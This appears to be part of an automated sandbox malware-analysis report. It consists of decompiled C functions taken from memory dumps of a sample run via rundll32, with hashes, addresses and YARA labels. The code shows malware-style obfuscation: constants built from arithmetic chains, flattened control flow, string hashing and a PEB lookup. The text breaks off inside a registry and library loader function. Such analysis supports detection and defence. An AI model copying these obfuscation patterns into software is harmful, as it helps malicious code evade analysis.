0x00344606
0x00344607
0x0034460d
0x00344613
0x0034461f
0x00000000
0x00344615
0x00344615
0x00000000
0x00344615
0x00000000
0x00344624
0x00344624
0x00000000

Memory Dump Source

Source File: 00000009.00000002.460122857.0000000000341000.00000020.00000800.00020000.00000000.sdmp, Offset: 00340000, based on PE: true

Associated: 00000009.00000002.460117697.0000000000340000.00000004.00000800.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.460138899.0000000000363000.00000004.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_340000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9cc02864a81945eddb5ef4185070ac249e0cb8defb4cdab54dbc35af79157951
Instruction ID: 0be2f338fcd8180449d45cf20782124b38bf88ab27717cb2aae6268378de5959
Opcode Fuzzy Hash: 9cc02864a81945eddb5ef4185070ac249e0cb8defb4cdab54dbc35af79157951
Instruction Fuzzy Hash: 327133B2109341AFD359CF21C98992BBBF1EBD9718F10891DF2955A260D3B2D949CF83

Uniqueness

Uniqueness Score: -1.00%

Function 0035894B Relevance: .1, Instructions: 128
COMMONCrypto

Download Yara Rule

C-Code - Quality: 90%

			E0035894B(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				char _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				void* _t97;
				void* _t111;
				void* _t115;
				void* _t117;
				void* _t135;
				void* _t136;
				signed int _t137;
				signed int _t138;
				signed int _t139;
				signed int _t140;
				void* _t142;
				void* _t143;

				_push(_a16);
				_t115 = __edx;
				_t135 = __ecx;
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E003520B9(_t97);
				_v64 = 0x51cd23;
				_t143 = _t142 + 0x18;
				_t136 = 0;
				_t117 = 0x1f0121b;
				_t137 = 0x4d;
				_v64 = _v64 / _t137;
				_v64 = _v64 >> 9;
				_v64 = _v64 ^ 0x00032222;
				_v68 = 0xd4b8b7;
				_v68 = _v68 + 0xffffd2af;
				_v68 = _v68 ^ 0xd36e67b3;
				_v68 = _v68 ^ 0xd3b4aa1e;
				_v76 = 0x6efd74;
				_v76 = _v76 << 5;
				_v76 = _v76 ^ 0x2f6bad1f;
				_t138 = 0x34;
				_v76 = _v76 / _t138;
				_v76 = _v76 ^ 0x00af6c6b;
				_v52 = 0x9958c4;
				_v52 = _v52 + 0xffff4241;
				_v52 = _v52 ^ 0x009a50fc;
				_v56 = 0x2e84bf;
				_t139 = 0x72;
				_v56 = _v56 * 0x77;
				_v56 = _v56 ^ 0x15969b56;
				_v80 = 0x2bfbd3;
				_v80 = _v80 | 0xbb654ab5;
				_v80 = _v80 * 0x48;
				_v80 = _v80 >> 8;
				_v80 = _v80 ^ 0x00b72d27;
				_v60 = 0xb8f349;
				_v60 = _v60 / _t139;
				_v60 = _v60 ^ 0xcb885b35;
				_v60 = _v60 ^ 0xcb801a24;
				_v72 = 0xbf562d;
				_t140 = 0x42;
				_v72 = _v72 / _t140;
				_v72 = _v72 ^ 0xd5944d41;
				_v72 = _v72 ^ 0x4a8545c0;
				_v72 = _v72 ^ 0x9f1c34cb;
				_v48 = 0xda7c79;
				_v48 = _v48 << 0xc;
				_v48 = _v48 ^ 0xa7c49699;
				do {
					while(_t117 != 0x1f0121b) {
						if(_t117 == 0x20f75ec) {
							E00343DBC( &_v44, _t115, _v64, _v68, _v76);
							_t143 = _t143 + 0xc;
							_t117 = 0x98c428b;
							continue;
						} else {
							if(_t117 == 0x98c428b) {
								_t111 = E00342A21(_v52, _v56,  &_v44, _t135, _v80);
								_t143 = _t143 + 0xc;
								__eflags = _t111;
								if(__eflags != 0) {
									_t117 = 0xea94eac;
									continue;
								}
							} else {
								_t149 = _t117 - 0xea94eac;
								if(_t117 != 0xea94eac) {
									goto L11;
								} else {
									E0035D97D( &_v44, _v60, _t149, _v72, _t135 + 4, _v48);
									_t136 =  !=  ? 1 : _t136;
								}
							}
						}
						L6:
						return _t136;
					}
					_t117 = 0x20f75ec;
					L11:
					__eflags = _t117 - 0x3544eb3;
				} while (__eflags != 0);
				goto L6;
			}

0x00358952
0x00358956
0x00358958
0x0035895a
0x0035895e
0x00358962
0x00358966
0x00358967
0x00358968
0x0035896d
0x00358975
0x0035897e
0x00358980
0x00358987
0x0035898c
0x00358992
0x00358997
0x0035899f
0x003589a7
0x003589af
0x003589b7
0x003589bf
0x003589c7
0x003589cc
0x003589d8
0x003589dd
0x003589e3
0x003589eb
0x003589f3
0x003589fb
0x00358a03
0x00358a10
0x00358a13
0x00358a17
0x00358a1f
0x00358a27
0x00358a34
0x00358a38
0x00358a3d
0x00358a45
0x00358a55
0x00358a59
0x00358a61
0x00358a69
0x00358a75
0x00358a7d
0x00358a81
0x00358a89
0x00358a91
0x00358a99
0x00358aa1
0x00358aa6
0x00358aae
0x00358aae
0x00358abc
0x00358b33
0x00358b38
0x00358b3b
0x00000000
0x00358abe
0x00358ac4
0x00358b0e
0x00358b13
0x00358b16
0x00358b18
0x00358b1a
0x00000000
0x00358b1a
0x00358ac6
0x00358ac6
0x00358acc
0x00000000
0x00358ace
0x00358ae2
0x00358aef
0x00358aef
0x00358acc
0x00358ac4
0x00358af3
0x00358afb
0x00358afb
0x00358b45
0x00358b47
0x00358b47
0x00358b47
0x00000000

Memory Dump Source

Source File: 00000009.00000002.460122857.0000000000341000.00000020.00000800.00020000.00000000.sdmp, Offset: 00340000, based on PE: true

Associated: 00000009.00000002.460117697.0000000000340000.00000004.00000800.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.460138899.0000000000363000.00000004.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_340000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1b994c2edb50fd6b115e90a35cbab81c68b2645124e9f6c859b54d3fe4614af7
Instruction ID: 9f09008dabbaa50f42fb247097ed8b7459942f6b8bf7a02548898fd55da57011
Opcode Fuzzy Hash: 1b994c2edb50fd6b115e90a35cbab81c68b2645124e9f6c859b54d3fe4614af7
Instruction Fuzzy Hash: 26518771108301AFC755CF22C98681BBBE5FBD8708F40892DF995AA220D772CA19CF87

Uniqueness

Uniqueness Score: -1.00%

Function 0035AC3A Relevance: .1, Instructions: 89
COMMONCrypto

Download Yara Rule

C-Code - Quality: 95%

			E0035AC3A(void* __ecx) {
				signed int _v4;
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				void* _t82;
				signed int _t85;
				signed int _t86;
				void* _t88;
				void* _t96;
				void* _t97;
				signed int* _t99;

				_t88 = __ecx;
				_t99 =  &_v28;
				_v24 = 0x5aa995;
				_v24 = _v24 | 0x25663b9c;
				_v24 = _v24 << 6;
				_t85 = 0x11;
				_v24 = _v24 / _t85;
				_t96 = 0;
				_v24 = _v24 ^ 0x05a97123;
				_t97 = 0xfe6f9f;
				_v16 = 0x9f09af;
				_v16 = _v16 + 0xcb37;
				_v16 = _v16 ^ 0x3a843722;
				_v16 = _v16 ^ 0x3a14bc19;
				_v28 = 0x7e93e4;
				_v28 = _v28 << 0xa;
				_t86 = 0x1a;
				_v28 = _v28 / _t86;
				_v28 = _v28 ^ 0x4056cd73;
				_v28 = _v28 ^ 0x49f3cf3d;
				_v4 = 0x47c602;
				_v4 = _v4 ^ 0xe3aa640e;
				_v4 = _v4 | 0xd85731ad;
				_v4 = _v4 ^ 0xfbf46e2b;
				_v8 = 0x201e29;
				_v8 = _v8 << 0x10;
				_v8 = _v8 * 0x48;
				_v8 = _v8 ^ 0x7b8200e2;
				_v12 = 0x18f9c1;
				_v12 = _v12 * 0x54;
				_v12 = _v12 << 6;
				_v12 = _v12 ^ 0x0c72dcb8;
				_v20 = 0xd6b502;
				_v20 = _v20 * 0x55;
				_v20 = _v20 << 0xd;
				_v20 = _v20 >> 0xb;
				_v20 = _v20 ^ 0x00034ef9;
				do {
					while(_t97 != 0xfe6f9f) {
						if(_t97 == 0x2f82a60) {
							_push(_t88);
							_push(_t88);
							_t82 = E0034474B();
							_t99 =  &(_t99[2]);
							_t97 = 0x6e030e4;
							_t96 = _t96 + _t82;
							continue;
						} else {
							if(_t97 != 0x6e030e4) {
								goto L8;
							} else {
								_t96 = _t96 + E0035C2F8(_v4, _t88 + 4, _v8, _v12, _v20);
							}
						}
						L5:
						return _t96;
					}
					_t97 = 0x2f82a60;
					L8:
				} while (_t97 != 0xea6061f);
				goto L5;
			}

0x0035ac3a
0x0035ac3a
0x0035ac3d
0x0035ac47
0x0035ac4f
0x0035ac5e
0x0035ac68
0x0035ac6c
0x0035ac6e
0x0035ac76
0x0035ac78
0x0035ac80
0x0035ac88
0x0035ac90
0x0035ac98
0x0035aca0
0x0035acab
0x0035acb8
0x0035acbc
0x0035acc4
0x0035accc
0x0035acd4
0x0035acdc
0x0035ace4
0x0035acec
0x0035acf4
0x0035acfe
0x0035ad02
0x0035ad0a
0x0035ad17
0x0035ad1b
0x0035ad20
0x0035ad28
0x0035ad35
0x0035ad39
0x0035ad3e
0x0035ad43
0x0035ad4b
0x0035ad4b
0x0035ad51
0x0035ad8a
0x0035ad8b
0x0035ad8c
0x0035ad91
0x0035ad94
0x0035ad96
0x00000000
0x0035ad53
0x0035ad55
0x00000000
0x0035ad57
0x0035ad72
0x0035ad72
0x0035ad55
0x0035ad74
0x0035ad7d
0x0035ad7d
0x0035ad9a
0x0035ad9c
0x0035ad9c
0x00000000

Memory Dump Source

Source File: 00000009.00000002.460122857.0000000000341000.00000020.00000800.00020000.00000000.sdmp, Offset: 00340000, based on PE: true

Associated: 00000009.00000002.460117697.0000000000340000.00000004.00000800.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.460138899.0000000000363000.00000004.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_340000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 40cc6cecb1fba03418c52cfe3ac00d0d2a6f5e6b8535ed7c2259ea5577511e05
Instruction ID: e09a7dae8c1df6a9b20ff1e2d332979a522c6ee3d89043a7811dee5520881e33
Opcode Fuzzy Hash: 40cc6cecb1fba03418c52cfe3ac00d0d2a6f5e6b8535ed7c2259ea5577511e05
Instruction Fuzzy Hash: 673176724083018FC315DF25D88580BFBE0FBD8788F118A1DF599AB220D375DA498B97

Uniqueness

Uniqueness Score: -1.00%

Function 00348969 Relevance: .1, Instructions: 84
COMMONCrypto

Download Yara Rule

C-Code - Quality: 83%

			E00348969(void* __ecx, void* __edx, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				intOrPtr _v44;
				void* _t84;
				signed int _t99;
				signed int _t103;
				void* _t109;
				signed int _t110;

				_push(_a8);
				_t109 = __edx;
				_push(_a4);
				_push(__edx);
				E003520B9(_t84);
				_v40 = _v40 & 0x00000000;
				_v36 = _v36 & 0x00000000;
				_v44 = 0x779abe;
				_v20 = 0xb5573d;
				_v20 = _v20 ^ 0xbb0d078e;
				_t103 = 0x58;
				_v20 = _v20 * 0x30;
				_v20 = _v20 ^ 0x328c396d;
				_v16 = 0x362481;
				_v16 = _v16 + 0x16cb;
				_v16 = _v16 | 0xfe676eb4;
				_v16 = _v16 ^ 0xfe76a30b;
				_v32 = 0xc91798;
				_v32 = _v32 * 0x65;
				_v32 = _v32 ^ 0x4f59c84a;
				_v28 = 0xb97254;
				_v28 = _v28 / _t103;
				_v28 = _v28 ^ 0x000673a7;
				_v12 = 0xb6c56;
				_v12 = _v12 * 0x2a;
				_v12 = _v12 << 1;
				_v12 = _v12 * 0x5b;
				_v12 = _v12 ^ 0x5515a6e4;
				_v8 = 0x1f2e02;
				_v8 = _v8 * 0x66;
				_v8 = _v8 * 0x79;
				_v8 = _v8 + 0xffff535b;
				_v8 = _v8 ^ 0xdf3e36a5;
				_v24 = 0x692813;
				_v24 = _v24 >> 0xb;
				_v24 = _v24 + 0xffffcb9d;
				_v24 = _v24 ^ 0xfffb0f76;
				E0035D25E(_t103);
				_v16 = 0x87422f;
				_v16 = _v16 | 0xfc58150b;
				_v16 = _v16 ^ 0xfcdf572b;
				_v20 = 0xc6266d;
				_v20 = _v20 << 0xa;
				_v20 = _v20 + 0xffff7638;
				_v20 = _v20 ^ 0x18992a28;
				_t99 = E00350AE0(_v20, _v16);
				_push(_v24);
				_t110 = _t99;
				_push(_t109);
				_push(_t110);
				_push(1);
				E003480E3(_v12, _v8);
				 *((short*)(_t109 + _t110 * 2)) = 0;
				return 0;
			}

0x00348971
0x00348974
0x00348976
0x00348979
0x0034897b
0x00348980
0x00348986
0x0034898a
0x00348991
0x00348998
0x003489a5
0x003489a6
0x003489a9
0x003489b0
0x003489b7
0x003489be
0x003489c5
0x003489cc
0x003489d7
0x003489da
0x003489e1
0x003489ed
0x003489f0
0x003489f7
0x00348a02
0x00348a05
0x00348a0c
0x00348a0f
0x00348a16
0x00348a21
0x00348a28
0x00348a2b
0x00348a32
0x00348a39
0x00348a40
0x00348a44
0x00348a4b
0x00348a58
0x00348a5d
0x00348a64
0x00348a6b
0x00348a72
0x00348a79
0x00348a7d
0x00348a84
0x00348a97
0x00348a9c
0x00348aa2
0x00348aa7
0x00348aa8
0x00348aa9
0x00348aab
0x00348ab5
0x00348abe

Memory Dump Source

Source File: 00000009.00000002.460122857.0000000000341000.00000020.00000800.00020000.00000000.sdmp, Offset: 00340000, based on PE: true

Associated: 00000009.00000002.460117697.0000000000340000.00000004.00000800.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.460138899.0000000000363000.00000004.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_340000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 731ac0dd4150b2fd44d590bae25ae052b41519021f0b5901ead843c46a23c023
Instruction ID: de8b9d5bf1754f823453a28120801b126bdc36c3a41c75306e2465a3093e68ad
Opcode Fuzzy Hash: 731ac0dd4150b2fd44d590bae25ae052b41519021f0b5901ead843c46a23c023
Instruction Fuzzy Hash: 4E41CF75C0121AEBCF18CFE5C98A9EEBFB0FB44314F108199D525AA260D3B95B45CF90

Uniqueness

Uniqueness Score: -1.00%

Function 0035DBEA Relevance: .1, Instructions: 76
COMMONCrypto

Download Yara Rule

C-Code - Quality: 88%

			E0035DBEA(char* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				void* _t74;
				char* _t82;
				signed int _t84;

				_push(_a12);
				_t82 = __edx;
				_push(_a8);
				_push(_a4);
				_push(__edx);
				E003520B9(_t74);
				_v20 = _v20 & 0x00000000;
				_v16 = _v16 & 0x00000000;
				_v28 = 0x71ca23;
				_v24 = 0x57f692;
				_v12 = 0xd3252c;
				_v12 = _v12 + 0x4351;
				_v12 = _v12 + 0xffff5b79;
				_v12 = _v12 ^ 0x00d2c3f6;
				_v8 = 0xbb067e;
				_t84 = 0x11;
				_v8 = _v8 / _t84;
				_v8 = _v8 >> 8;
				_v8 = _v8 ^ 0xac5d3832;
				_v8 = _v8 ^ 0xac5d3334;
				_v8 = 0xab60c2;
				_v8 = _v8 << 0x10;
				_v8 = _v8 ^ 0x910d5570;
				_v8 = _v8 >> 4;
				_v8 = _v8 ^ 0x0f1cf547;
				if( *__edx != 0) {
					do {
						_v8 = 0xbb067e;
						_v8 = _v8 / _t84;
						_v8 = _v8 >> 8;
						_v8 = _v8 ^ 0xac5d3832;
						_v8 = _v8 ^ 0xac5d3334;
						_v8 = 0xab60c2;
						_v8 = _v8 << 0x10;
						_v8 = _v8 ^ 0x910d5570;
						_v8 = _v8 >> 4;
						_v8 = _v8 ^ 0x0f1cf547;
						_v12 =  *_t82;
						_v12 = _v12 + (_v12 << _v8);
						_v12 = _v12 + (_v12 << _v8);
						_v12 = _v12 - _v12;
						_t82 = _t82 + 1;
						_t84 = 0x11;
					} while ( *_t82 != 0);
				}
				return _v12;
			}

0x0035dbf1
0x0035dbf4
0x0035dbf6
0x0035dbf9
0x0035dbfc
0x0035dbfe
0x0035dc03
0x0035dc0a
0x0035dc10
0x0035dc17
0x0035dc1e
0x0035dc25
0x0035dc2c
0x0035dc33
0x0035dc3a
0x0035dc46
0x0035dc49
0x0035dc4c
0x0035dc50
0x0035dc57
0x0035dc5e
0x0035dc65
0x0035dc69
0x0035dc70
0x0035dc74
0x0035dc7e
0x0035dc82
0x0035dc87
0x0035dc95
0x0035dc98
0x0035dc9c
0x0035dca3
0x0035dcb0
0x0035dcb7
0x0035dcbb
0x0035dcc2
0x0035dcc6
0x0035dcd8
0x0035dcdb
0x0035dce0
0x0035dce3
0x0035dce6
0x0035dce7
0x0035dce8
0x0035dcee
0x0035dcf6

Memory Dump Source

Source File: 00000009.00000002.460122857.0000000000341000.00000020.00000800.00020000.00000000.sdmp, Offset: 00340000, based on PE: true

Associated: 00000009.00000002.460117697.0000000000340000.00000004.00000800.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.460138899.0000000000363000.00000004.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_340000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e97a60f92e4476a9044cdee827ee64364931a3f318d6e648f2f6c43f9dd04637
Instruction ID: 58a046cd3a7915f71043f201bb3d0e214162e66a4cf70dbcbc376ec5cc8fe83b
Opcode Fuzzy Hash: e97a60f92e4476a9044cdee827ee64364931a3f318d6e648f2f6c43f9dd04637
Instruction Fuzzy Hash: 2531F175D02358EBDF06DFA8CA4A6DEBBB1EF44315F208099D901A7265D3B14B98EF40

Uniqueness

Uniqueness Score: -1.00%

Function 0035176B Relevance: .1, Instructions: 75
COMMONCrypto

Download Yara Rule

C-Code - Quality: 88%

			E0035176B(void* __ecx, void* __eflags) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				intOrPtr _v40;
				signed int _t87;
				signed int _t91;
				signed int _t92;
				signed int _t93;
				void* _t102;
				signed int _t103;

				_v36 = _v36 & 0x00000000;
				_v40 = 0x355323;
				_v24 = 0x6eb9b5;
				_v24 = _v24 + 0x6c21;
				_t102 = __ecx;
				_t91 = 0x64;
				_v24 = _v24 / _t91;
				_v24 = _v24 ^ 0x0005c519;
				_v32 = 0xba69a0;
				_v32 = _v32 << 7;
				_v32 = _v32 ^ 0x5d3c95d0;
				_v20 = 0x99612d;
				_v20 = _v20 | 0x6bf7bfaf;
				_v20 = _v20 + 0x66ac;
				_v20 = _v20 ^ 0x6c036c89;
				_v16 = 0xd72900;
				_v16 = _v16 + 0xffff2462;
				_v16 = _v16 ^ 0xa7b97bfd;
				_v16 = _v16 + 0xffff7578;
				_v16 = _v16 ^ 0xa76084ba;
				_v12 = 0xeb6610;
				_t92 = 0x6f;
				_v12 = _v12 / _t92;
				_v12 = _v12 << 0xf;
				_v12 = _v12 ^ 0x2e835447;
				_v12 = _v12 ^ 0x21f4cf0c;
				_v28 = 0x644f8d;
				_v28 = _v28 << 3;
				_v28 = _v28 << 0xa;
				_v28 = _v28 ^ 0x89f1a004;
				_v8 = 0xbb77ef;
				_t93 = 0x72;
				_v8 = _v8 * 0x3c;
				_v8 = _v8 / _t93;
				_v8 = _v8 << 6;
				_v8 = _v8 ^ 0x18aaba50;
				_t87 = E00350AE0(_v8, _v28);
				_push(_v12);
				_t103 = _t87;
				_push(_t102);
				_push(_t103);
				_push(3);
				E003480E3(_v20, _v16);
				 *((short*)(_t102 + _t103 * 2)) = 0;
				return 0;
			}

0x00351771
0x00351777
0x0035177e
0x00351785
0x00351793
0x00351795
0x0035179a
0x0035179f
0x003517a6
0x003517ad
0x003517b1
0x003517b8
0x003517bf
0x003517c6
0x003517cd
0x003517d4
0x003517db
0x003517e2
0x003517e9
0x003517f0
0x003517f7
0x00351801
0x00351806
0x0035180b
0x0035180f
0x00351816
0x0035181d
0x00351824
0x00351828
0x0035182c
0x00351833
0x0035183e
0x0035183f
0x00351847
0x0035184a
0x0035184e
0x00351861
0x00351866
0x0035186c
0x00351871
0x00351872
0x00351873
0x00351875
0x0035187f
0x00351888

Memory Dump Source

Source File: 00000009.00000002.460122857.0000000000341000.00000020.00000800.00020000.00000000.sdmp, Offset: 00340000, based on PE: true

Associated: 00000009.00000002.460117697.0000000000340000.00000004.00000800.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.460138899.0000000000363000.00000004.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_340000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d638e8f48ed8eccc1823991200f18c017b773c580a1b9d4be8890f89af7529be
Instruction ID: 1c9bcdfd7c9a997e6b3de8fea50c9379a6c3d47d4435ad741c80c776b0025de3
Opcode Fuzzy Hash: d638e8f48ed8eccc1823991200f18c017b773c580a1b9d4be8890f89af7529be
Instruction Fuzzy Hash: A13133B2D0020AEBCB48DFE5C54AAEEBBB1FB44304F208099D515B6250D7B51B15CF90

Uniqueness

Uniqueness Score: -1.00%

Function 00349011 Relevance: .1, Instructions: 67
COMMONCrypto

Download Yara Rule

C-Code - Quality: 93%

			E00349011(void* __ecx, signed int __edx) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				intOrPtr _v44;
				intOrPtr _t75;
				intOrPtr _t80;
				signed int _t88;
				signed int _t89;

				_v40 = _v40 & 0x00000000;
				_v44 = 0xa2b624;
				_v8 = 0x99eb9;
				_t88 = __edx;
				_v8 = _v8 * 0x25;
				_v8 = _v8 | 0x30e9a4b5;
				_v8 = _v8 << 5;
				_v8 = _v8 ^ 0x3d7f3aa0;
				_v24 = 0x77b72d;
				_v24 = _v24 << 1;
				_v24 = _v24 ^ 0x00e56894;
				_v20 = 0x2ce6cf;
				_v20 = _v20 >> 6;
				_v20 = _v20 ^ 0x000f2bb3;
				_v32 = 0xab4cd;
				_v32 = _v32 >> 0xc;
				_v32 = _v32 ^ 0x0007aa85;
				_v28 = 0x1f3eea;
				_v28 = _v28 >> 9;
				_v28 = _v28 ^ 0x0004326d;
				_v12 = 0xc1e4f9;
				_v12 = _v12 ^ 0x329f08e7;
				_v12 = _v12 + 0xcc91;
				_v12 = _v12 >> 8;
				_v12 = _v12 ^ 0x0038f912;
				_v16 = 0x3b10d4;
				_t89 = 0x6f;
				_v16 = _v16 / _t89;
				_v16 = _v16 + 0xffff4357;
				_v16 = _v16 ^ 0xf8ba2c27;
				_v16 = _v16 ^ 0x074e6031;
				_v36 = 0x1364c3;
				_v36 = _v36 + 0x503c;
				_v36 = _v36 ^ 0x001cba9a;
				_push(_v20);
				_push(_v24);
				_t75 = E00355BFD(_v32, _v28, _v12, E0035DCF7(_v8, __ecx, _v36));
				_t80 =  *0x363df8; // 0x0
				 *((intOrPtr*)(_t80 + 4 + _t88 * 4)) = _t75;
				return E0034A8B0(_v16, _t74, _v36);
			}

0x00349017
0x0034901b
0x00349022
0x0034902f
0x00349035
0x00349038
0x0034903f
0x00349043
0x0034904a
0x00349051
0x00349054
0x0034905b
0x00349062
0x00349066
0x0034906d
0x00349074
0x00349078
0x0034907f
0x00349086
0x0034908a
0x00349091
0x00349098
0x0034909f
0x003490a6
0x003490aa
0x003490b1
0x003490bb
0x003490c0
0x003490c3
0x003490ca
0x003490d1
0x003490d8
0x003490df
0x003490e6
0x003490ed
0x003490f0
0x00349107
0x0034910c
0x00349117
0x0034912b

Memory Dump Source

Source File: 00000009.00000002.460122857.0000000000341000.00000020.00000800.00020000.00000000.sdmp, Offset: 00340000, based on PE: true

Associated: 00000009.00000002.460117697.0000000000340000.00000004.00000800.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.460138899.0000000000363000.00000004.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_340000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c7dd7f1bfbc7430bd799f6334800243eda0d8c1c7d652ae8d7b04b2c783a9cc0
Instruction ID: 9ddfc1a077b5963a4c3a67533616644b89c31a8ad79f18c4bb7309573ca67e3d
Opcode Fuzzy Hash: c7dd7f1bfbc7430bd799f6334800243eda0d8c1c7d652ae8d7b04b2c783a9cc0
Instruction Fuzzy Hash: 0531F071D0021EEBCF49EFA5D94A4EEBBB1FF44318F208198D421B6250D7B90A59DF90

Uniqueness

Uniqueness Score: -1.00%

Function 00347FF2 Relevance: .1, Instructions: 54
COMMONCrypto

Download Yara Rule

C-Code - Quality: 100%

			E00347FF2(void* __edx) {
				signed int _v8;
				unsigned int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				signed int _t67;
				void* _t73;

				_v32 = _v32 & 0x00000000;
				_v40 = 0xdad9ef;
				_v36 = 0x9bb390;
				_v28 = 0x653306;
				_v28 = _v28 + 0xffff1628;
				_v28 = _v28 >> 3;
				_v28 = _v28 ^ 0x000c892d;
				_v12 = 0x5dd1e8;
				_v12 = _v12 ^ 0xb170c383;
				_v12 = _v12 | 0x2785cc64;
				_v12 = _v12 >> 5;
				_v12 = _v12 ^ 0x05b45dea;
				_v8 = 0x56f6d9;
				_v8 = _v8 + 0xc121;
				_t73 = __edx;
				_t67 = 0x41;
				_v8 = _v8 / _t67;
				_v8 = _v8 << 7;
				_v8 = _v8 ^ 0x00a76089;
				_v24 = 0xf5edfd;
				_v24 = _v24 | 0x2f446a90;
				_v24 = _v24 ^ 0x7c479bdf;
				_v24 = _v24 ^ 0x53b1dfb9;
				_v20 = 0xafa903;
				_v20 = _v20 + 0xffff9fdf;
				_v20 = _v20 ^ 0xafba618c;
				_v20 = _v20 ^ 0xaf136809;
				_v16 = 0x74f1b4;
				_v16 = _v16 >> 7;
				_v16 = _v16 | 0x7bde77db;
				_v16 = _v16 ^ 0x7bddce28;
				return E00341E22(_v28, _v24, _t73, E00341DB9(_t67), _v20, _v16);
			}

0x00347ff8
0x00347ffc
0x00348003
0x0034800a
0x00348011
0x00348018
0x0034801c
0x00348023
0x0034802a
0x00348031
0x00348038
0x0034803c
0x00348043
0x0034804a
0x00348055
0x0034805b
0x0034805e
0x00348061
0x00348065
0x0034806c
0x00348073
0x0034807a
0x00348081
0x00348088
0x0034808f
0x00348096
0x0034809d
0x003480a4
0x003480ab
0x003480af
0x003480b6
0x003480e2

Memory Dump Source

Source File: 00000009.00000002.460122857.0000000000341000.00000020.00000800.00020000.00000000.sdmp, Offset: 00340000, based on PE: true

Associated: 00000009.00000002.460117697.0000000000340000.00000004.00000800.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.460138899.0000000000363000.00000004.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_340000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 880c888cbb4deb6cb63736a4bd77bb98d1251cff4ad54d84bc8c76c5b330e3fb
Instruction ID: 7580d9e387761295b21dafd0ceb3dd990d21bfd2781941a5175d47f3cefa733f
Opcode Fuzzy Hash: 880c888cbb4deb6cb63736a4bd77bb98d1251cff4ad54d84bc8c76c5b330e3fb
Instruction Fuzzy Hash: 8921EDB2C0131EEBCB48DFE5D94A5EEFBB0BB10314F208189D512B6264C3B41B898F91

Uniqueness

Uniqueness Score: -1.00%

Function 00354087 Relevance: .0, Instructions: 2
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00354087() {

				return  *[fs:0x30];
			}

0x0035408d

Memory Dump Source

Source File: 00000009.00000002.460122857.0000000000341000.00000020.00000800.00020000.00000000.sdmp, Offset: 00340000, based on PE: true

Associated: 00000009.00000002.460117697.0000000000340000.00000004.00000800.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.460138899.0000000000363000.00000004.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_340000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6cae658f33ca92bcc76ffcd72798f6487763aeebc788fd534dd3d52e563a93f0
Instruction ID: 25aae2582423029eb19f4489c776d3d70638aac6ce1da4afce0c8a8e650509f3
Opcode Fuzzy Hash: 6cae658f33ca92bcc76ffcd72798f6487763aeebc788fd534dd3d52e563a93f0
Instruction Fuzzy Hash:

Uniqueness

Uniqueness Score: -1.00%

Function 10014DA8 Relevance: 45.7, APIs: 21, Strings: 5, Instructions: 229
registrylibraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 84%

			E10014DA8(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				void* __ebp;
				signed int _t73;
				struct HINSTANCE__* _t78;
				_Unknown_base(*)()* _t79;
				struct HINSTANCE__* _t81;
				signed int _t92;
				signed int _t94;
				unsigned int _t97;
				void* _t113;
				unsigned int _t115;
				signed short _t123;
				unsigned int _t124;
				_Unknown_base(*)()* _t131;
				signed short _t133;
				unsigned int _t134;
